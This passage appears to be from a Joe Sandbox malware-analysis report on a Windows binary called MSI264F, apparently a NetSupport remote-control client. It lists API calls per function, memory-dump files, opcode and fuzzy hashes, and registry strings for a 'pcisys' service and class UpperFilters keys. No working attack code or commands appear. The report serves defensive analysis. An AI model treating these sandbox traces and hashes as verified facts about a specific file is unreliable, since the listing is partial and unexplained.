                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseDeleteOpenValue
                                                                                                                        • String ID: DisplayPath$System\CurrentControlSet\Services\pcisys
                                                                                                                        • API String ID: 849931509-2555881177
                                                                                                                        • Opcode ID: 530ca3b72d845c2d141967106ba19169b1ed1b0f9e39097e3933d7a728287969
                                                                                                                        • Instruction ID: 1d8f16136c8035f5d20bb304568b63b615d443aa19646f195fafc5491c09d6c7
                                                                                                                        • Opcode Fuzzy Hash: 530ca3b72d845c2d141967106ba19169b1ed1b0f9e39097e3933d7a728287969
                                                                                                                        • Instruction Fuzzy Hash: 0DE08675B40308B7D720DBD1DD45F6A73BCF748701F100188FE0563190D9B4E9009A50
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 00B324B9
                                                                                                                        • GetUserNameW.ADVAPI32(?,00B0F6B1), ref: 00B324D9
                                                                                                                          • Part of subcall function 00B31500: LoadLibraryW.KERNEL32(ADVAPI32.DLL,00000105,00B324EA), ref: 00B3150E
                                                                                                                        • _free.LIBCMT ref: 00B32588
                                                                                                                          • Part of subcall function 00B31D50: GetProcAddress.KERNEL32(?,GetNamedSecurityInfoW), ref: 00B31E3C
                                                                                                                          • Part of subcall function 00B31D50: GetAclInformation.ADVAPI32(?,?,0000000C,00000002,?,?,00000000), ref: 00B31EB2
                                                                                                                          • Part of subcall function 00B31D50: GetLastError.KERNEL32(?,?,00000000), ref: 00B31EBC
                                                                                                                          • Part of subcall function 00B31D50: GetLengthSid.ADVAPI32(?,?,?,00000000), ref: 00B31ED7
                                                                                                                          • Part of subcall function 00B31D50: GetProcessHeap.KERNEL32(00000000,?,?,?,00000000), ref: 00B31EEB
                                                                                                                          • Part of subcall function 00B31D50: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00B31EF2
                                                                                                                          • Part of subcall function 00B31D50: InitializeAcl.ADVAPI32(00000000,?,00000002,?,?,00000000), ref: 00B31EFE
                                                                                                                          • Part of subcall function 00B31D50: GetLastError.KERNEL32(?,?,00000000), ref: 00B31F08
                                                                                                                          • Part of subcall function 00B31D50: GetAce.ADVAPI32(?,00000000,?,?,?,00000000), ref: 00B31F49
                                                                                                                        • _free.LIBCMT ref: 00B32597
                                                                                                                        • _free.LIBCMT ref: 00B325A3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$ErrorHeapLast$AddressAllocInformationInitializeLengthLibraryLoadNameProcProcessUser_memset
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 934549695-0
                                                                                                                        • Opcode ID: a5528dc83effeb0051bacfac2c41d894acbd1c78b0b0a216b48bc773f4da803b
                                                                                                                        • Instruction ID: 3520a0168c5d8d815eb9d4ffa75b92970ef7656cfaa70e6fcead2732f72f9bba
                                                                                                                        • Opcode Fuzzy Hash: a5528dc83effeb0051bacfac2c41d894acbd1c78b0b0a216b48bc773f4da803b
                                                                                                                        • Instruction Fuzzy Hash: E0415172C41228ABCB25EBA4DD49BDEB3F8EF58710F1046D9E90A67141EB346B44CF90
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 00B32629
                                                                                                                        • GetUserNameW.ADVAPI32(?,00B2EC03), ref: 00B32649
                                                                                                                          • Part of subcall function 00B31500: LoadLibraryW.KERNEL32(ADVAPI32.DLL,00000105,00B324EA), ref: 00B3150E
                                                                                                                        • _free.LIBCMT ref: 00B326F2
                                                                                                                        • _free.LIBCMT ref: 00B326FE
                                                                                                                        • _free.LIBCMT ref: 00B3270A
                                                                                                                          • Part of subcall function 00B316C0: GetProcAddress.KERNEL32(?,GetNamedSecurityInfoW), ref: 00B31796
                                                                                                                          • Part of subcall function 00B316C0: GetAclInformation.ADVAPI32(?,?,0000000C,00000002,?,?,00000105,00000000), ref: 00B31806
                                                                                                                          • Part of subcall function 00B316C0: GetLastError.KERNEL32(?,?,00000105,00000000), ref: 00B31816
                                                                                                                          • Part of subcall function 00B316C0: GetLengthSid.ADVAPI32(?,?,?,00000105,00000000), ref: 00B3182D
                                                                                                                          • Part of subcall function 00B316C0: GetProcessHeap.KERNEL32(00000000,?,?,?,00000105,00000000), ref: 00B31841
                                                                                                                          • Part of subcall function 00B316C0: HeapAlloc.KERNEL32(00000000,?,?,00000105,00000000), ref: 00B31848
                                                                                                                          • Part of subcall function 00B316C0: InitializeAcl.ADVAPI32(00000000,?,00000002,?,?,00000105,00000000), ref: 00B31858
                                                                                                                          • Part of subcall function 00B316C0: GetLastError.KERNEL32(?,?,00000105,00000000), ref: 00B31862
                                                                                                                          • Part of subcall function 00B316C0: GetAce.ADVAPI32(?,00000000,?,?,?,00000105,00000000), ref: 00B318A9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$ErrorHeapLast$AddressAllocInformationInitializeLengthLibraryLoadNameProcProcessUser_memset
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 934549695-0
                                                                                                                        • Opcode ID: cdb93c58fa2f4ca4c3855f9b8954ed78ef86391902e1b1ee93b6489b78ebf512
                                                                                                                        • Instruction ID: 0c7bfd9325a23ea2fe6f3f903d14c9e0691c113e364ef24c50862266dc86f725
                                                                                                                        • Opcode Fuzzy Hash: cdb93c58fa2f4ca4c3855f9b8954ed78ef86391902e1b1ee93b6489b78ebf512
                                                                                                                        • Instruction Fuzzy Hash: 68314176841218ABCB25EBA4DD49FDEB3F8EF58710F1046D9E90A67180EB346B44CF90
                                                                                                                        APIs
                                                                                                                        • PlaySoundW.WINMM(00B8B7E8,00000000,00020001), ref: 00B14155
                                                                                                                          • Part of subcall function 00B38406: __fassign.LIBCMT ref: 00B383E3
                                                                                                                          • Part of subcall function 00B3B767: __isdigit_l.LIBCMT ref: 00B3B78C
                                                                                                                        • Beep.KERNEL32(00000000,00000000), ref: 00B14119
                                                                                                                        • MessageBeep.USER32(00000000), ref: 00B1412B
                                                                                                                        • MessageBeep.USER32(-00000010), ref: 00B1413F
                                                                                                                        • MessageBeep.USER32(?), ref: 00B14161
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Beep$Message$PlaySound__fassign__isdigit_l
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3205513384-0
                                                                                                                        • Opcode ID: a4531dda29804e6140b63a98792ce077235dea8f40968403de01581d663b61b0
                                                                                                                        • Instruction ID: 3527cfddbe3f595e600d380d2cdf9f23eeca8e3864bd129f5e0fb70df269d929
                                                                                                                        • Opcode Fuzzy Hash: a4531dda29804e6140b63a98792ce077235dea8f40968403de01581d663b61b0
                                                                                                                        • Instruction Fuzzy Hash: 2121F676500310A2E6102765AC06BFB36D8DFD0BA1F8400B5FE1D931A1EB35CCE1D262
                                                                                                                        APIs
                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,00000000,?), ref: 00AE9518
                                                                                                                        • __alloca_probe_16.LIBCMT ref: 00AE951D
                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 00AE9534
                                                                                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00B8A118,?,00000001,00000001), ref: 00AE9560
                                                                                                                        • EqualSid.ADVAPI32(?,00000000,?,00000001,00000001), ref: 00AE9573
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: InformationToken$AllocateEqualInitialize__alloca_probe_16
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1863994463-0
                                                                                                                        • Opcode ID: 8119bf245463a339d61dc67862bce7cb5610e81c48843a9c918ff7dbd79b3ee9
                                                                                                                        • Instruction ID: aa0d5bdad85a8601179fb6e798e67266d769090cb33b27a754827d463b28a0e7
                                                                                                                        • Opcode Fuzzy Hash: 8119bf245463a339d61dc67862bce7cb5610e81c48843a9c918ff7dbd79b3ee9
                                                                                                                        • Instruction Fuzzy Hash: 6E212F71A01209ABEB10DBA5DC85FBFB7F8EB48700F50045AA914E7291EAB19D048BA1
                                                                                                                        APIs
                                                                                                                        • GlobalAlloc.KERNEL32(00000042), ref: 00B06AE5
                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00B06AFA
                                                                                                                        • CreatePalette.GDI32(00000000), ref: 00B06B5C
                                                                                                                        • GlobalUnlock.KERNEL32(?), ref: 00B06B68
                                                                                                                        • GlobalFree.KERNEL32(?), ref: 00B06B6F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Global$AllocCreateFreeLockPaletteUnlock
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3539721555-0
                                                                                                                        • Opcode ID: 39dde38b983d520eb1592ee6ff7fb67f3a6504c7f0104fed9e815ca6d2fa9450
                                                                                                                        • Instruction ID: cab6ae7ab9e262d75e9db768a98ab887988d45630aa72f548ae65750aa94246a
                                                                                                                        • Opcode Fuzzy Hash: 39dde38b983d520eb1592ee6ff7fb67f3a6504c7f0104fed9e815ca6d2fa9450
                                                                                                                        • Instruction Fuzzy Hash: 06217C714053909BC7118F7888557AAFFF8EF16311F1881EEE988873D1D67B9944C7A1
                                                                                                                        APIs
                                                                                                                        • CoCreateInstance.OLE32(00B6B478,00000000,00000001,00B6B488,?), ref: 00AF6E92
                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 00AF6EB9
                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 00AF6ED2
                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 00AF6F0A
                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 00AF6F0D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: String$AllocFree$CreateInstance
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1867060851-0
                                                                                                                        • Opcode ID: 5fb329e0e9cd0455417a27a14becbbc5c8818956e817b24fbd666ec2abc31d7b
                                                                                                                        • Instruction ID: ce395c9cd6379316414d698dea29233c37c124d054ce2ef4811aae4ffc27432e
                                                                                                                        • Opcode Fuzzy Hash: 5fb329e0e9cd0455417a27a14becbbc5c8818956e817b24fbd666ec2abc31d7b
                                                                                                                        • Instruction Fuzzy Hash: 63215E75600208AFCB00DFA9DC85E9AB7FDEF89310B1041A5F908DB351DA74EE05CBA0
                                                                                                                        APIs
                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,0002001F,?), ref: 00AFB10B
                                                                                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00AFB14B
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00AFB1A3
                                                                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00AFB1AB
                                                                                                                          • Part of subcall function 00AFB0E0: RegEnumKeyExW.ADVAPI32(?,00000000,?,00000100,00000000,00000000,00000000,?), ref: 00AFB196
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Enum$CloseDeleteOpen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2095303065-0
                                                                                                                        • Opcode ID: 8f7efc34cd77b7501c04d07c955202e79333c7cb2becf2a7c941f09606fdb16e
                                                                                                                        • Instruction ID: 0f992d00b79ba2c1c27ef2b6c5c935d3028c5b7c451076a511e055e82067932a
                                                                                                                        • Opcode Fuzzy Hash: 8f7efc34cd77b7501c04d07c955202e79333c7cb2becf2a7c941f09606fdb16e
                                                                                                                        • Instruction Fuzzy Hash: 1D213EB590021DAADB21DB94DC48FFB73BCEB48704F008289FA1993151DA70AE448F74
                                                                                                                        APIs
                                                                                                                        • _malloc.LIBCMT ref: 00B3A213
                                                                                                                          • Part of subcall function 00B37CA4: __FF_MSGBANNER.LIBCMT ref: 00B37CBD
                                                                                                                          • Part of subcall function 00B37CA4: __NMSG_WRITE.LIBCMT ref: 00B37CC4
                                                                                                                          • Part of subcall function 00B37CA4: RtlAllocateHeap.NTDLL(00000000,00000001,00000000,?,75BF73E0,?,00B097EE,00000000,?,?), ref: 00B37CE9
                                                                                                                        • _free.LIBCMT ref: 00B3A226
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateHeap_free_malloc
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1020059152-0
                                                                                                                        • Opcode ID: 140a332991cbb5f96e75cdf412c0fe3a9f24b43052313fc6da659bdfe37fdf24
                                                                                                                        • Instruction ID: d539c19a21ad28cb06300443acc253233486194b87ca358f348a68a95e3a3823
                                                                                                                        • Opcode Fuzzy Hash: 140a332991cbb5f96e75cdf412c0fe3a9f24b43052313fc6da659bdfe37fdf24
                                                                                                                        • Instruction Fuzzy Hash: 4911C632944611BBCF213BB4AC05A6B3FD9EF81360F3045E6F8889B691DE36D940C795
                                                                                                                        APIs
                                                                                                                        • GetFileAttributesW.KERNEL32(00B18D38,?,?,00B18D38,?), ref: 00B163B6
                                                                                                                        • __wcsdup.LIBCMT ref: 00B163D1
                                                                                                                          • Part of subcall function 00B16390: _free.LIBCMT ref: 00B163FA
                                                                                                                        • _free.LIBCMT ref: 00B16408
                                                                                                                          • Part of subcall function 00B379A7: HeapFree.KERNEL32(00000000,00000000,?,00B42B7C,00000000,?,00B097EE,00000000), ref: 00B379BD
                                                                                                                          • Part of subcall function 00B379A7: GetLastError.KERNEL32(00000000,?,00B42B7C,00000000,?,00B097EE,00000000), ref: 00B379CF
                                                                                                                        • CreateDirectoryW.KERNEL32(00B18D38,00000000,?,?,?,00B18D38,?), ref: 00B16413
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$AttributesCreateDirectoryErrorFileFreeHeapLast__wcsdup
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3120057194-0
                                                                                                                        • Opcode ID: 265e42e5b852edb06a859b57a14ec4474741364dceaf39800857fb19a4518233
                                                                                                                        • Instruction ID: b8c1dff9a6bcfe4a6f45e395bf5af9ca2b5de4f985d85357c19a342836a81682
                                                                                                                        • Opcode Fuzzy Hash: 265e42e5b852edb06a859b57a14ec4474741364dceaf39800857fb19a4518233
                                                                                                                        • Instruction Fuzzy Hash: 480192766012152BE720267DBC03BFB37D9CFC1770F5845BAF809C7291FA62E99641A2
                                                                                                                        APIs
                                                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000001), ref: 00B046ED
                                                                                                                        • OpenServiceW.ADVAPI32(00000000,?,00000004), ref: 00B04701
                                                                                                                        • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00B04712
                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 00B0471F
                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 00B04726
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Service$CloseHandleOpen$ManagerQueryStatus
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2623946379-0
                                                                                                                        • Opcode ID: 180284a906c11fb0b1d43efdbc713d423afabdd6934a4d8d3738dd0b59df2efb
                                                                                                                        • Instruction ID: b02bcff7d53e92fb799589bd14f364d3bb1401f0efecccabbae2b520da9a5089
                                                                                                                        • Opcode Fuzzy Hash: 180284a906c11fb0b1d43efdbc713d423afabdd6934a4d8d3738dd0b59df2efb
                                                                                                                        • Instruction Fuzzy Hash: 5AF08276241520BBEA211B24AC49FAB3B6CDB86B61F044105FB15CB2D0DFB98C018670
                                                                                                                        APIs
                                                                                                                        • __getptd.LIBCMT ref: 00B42931
                                                                                                                          • Part of subcall function 00B42B8B: __getptd_noexit.LIBCMT ref: 00B42B8E
                                                                                                                          • Part of subcall function 00B42B8B: __amsg_exit.LIBCMT ref: 00B42B9B
                                                                                                                        • __getptd.LIBCMT ref: 00B42948
                                                                                                                        • __amsg_exit.LIBCMT ref: 00B42956
                                                                                                                        • __lock.LIBCMT ref: 00B42966
                                                                                                                        • __updatetlocinfoEx_nolock.LIBCMT ref: 00B4297A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 938513278-0
                                                                                                                        • Opcode ID: 8cf77e1eb217dbaa63e3bdb7651ff06799d16b11fdbfcc3706bc65844a6f29da
                                                                                                                        • Instruction ID: abe6d03aa0ec28208158c6efdd8dc0b9cef6baee044176ccaadbce3a142c92e4
                                                                                                                        • Opcode Fuzzy Hash: 8cf77e1eb217dbaa63e3bdb7651ff06799d16b11fdbfcc3706bc65844a6f29da
                                                                                                                        • Instruction Fuzzy Hash: 8CF09032940701ABDA24BBB89847B5D37E0EF04B20FE441E9F405A72D2CF644B42FB55
                                                                                                                        APIs
                                                                                                                        • wsprintfW.USER32 ref: 00AEA3D6
                                                                                                                          • Part of subcall function 00B049E0: RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,?,?,?,?,?), ref: 00B04A0B
                                                                                                                          • Part of subcall function 00B04B90: RegQueryValueExW.ADVAPI32(00020019,?,00000000,80000002,80000002,00020019,?,75BF73E0,00000010,?,?,00AE63B6,?,?,?,80000002), ref: 00B04BB8
                                                                                                                        • __wcsicoll.LIBCMT ref: 00AEA4A8
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateQueryValue__wcsicollwsprintf
                                                                                                                        • String ID: SYSTEM\CurrentControlSet\Control\Class\%s$UpperFilters
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00B049E0: RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,?,?,?,?,?), ref: 00B04A0B
                                                                                                                          • Part of subcall function 00B04990: RegOpenKeyExW.ADVAPI32(?,?,00000000,?), ref: 00B049AC
                                                                                                                          • Part of subcall function 00B044E0: RegEnumKeyExW.ADVAPI32(?,?,?,00000200,00000000,00000000,00000000,5E06C67B,00000000,00000000), ref: 00B0452B
                                                                                                                        • _malloc.LIBCMT ref: 00AE4790
                                                                                                                        • _free.LIBCMT ref: 00AE4835
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateEnumOpen_free_malloc
                                                                                                                        • String ID: IsA()$e:\nsmsrc\nsm\1410\1410\ctl32\NSMString.h
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00B04990: RegOpenKeyExW.ADVAPI32(?,?,00000000,?), ref: 00B049AC
                                                                                                                          • Part of subcall function 00B04AE0: RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?), ref: 00B04AFD
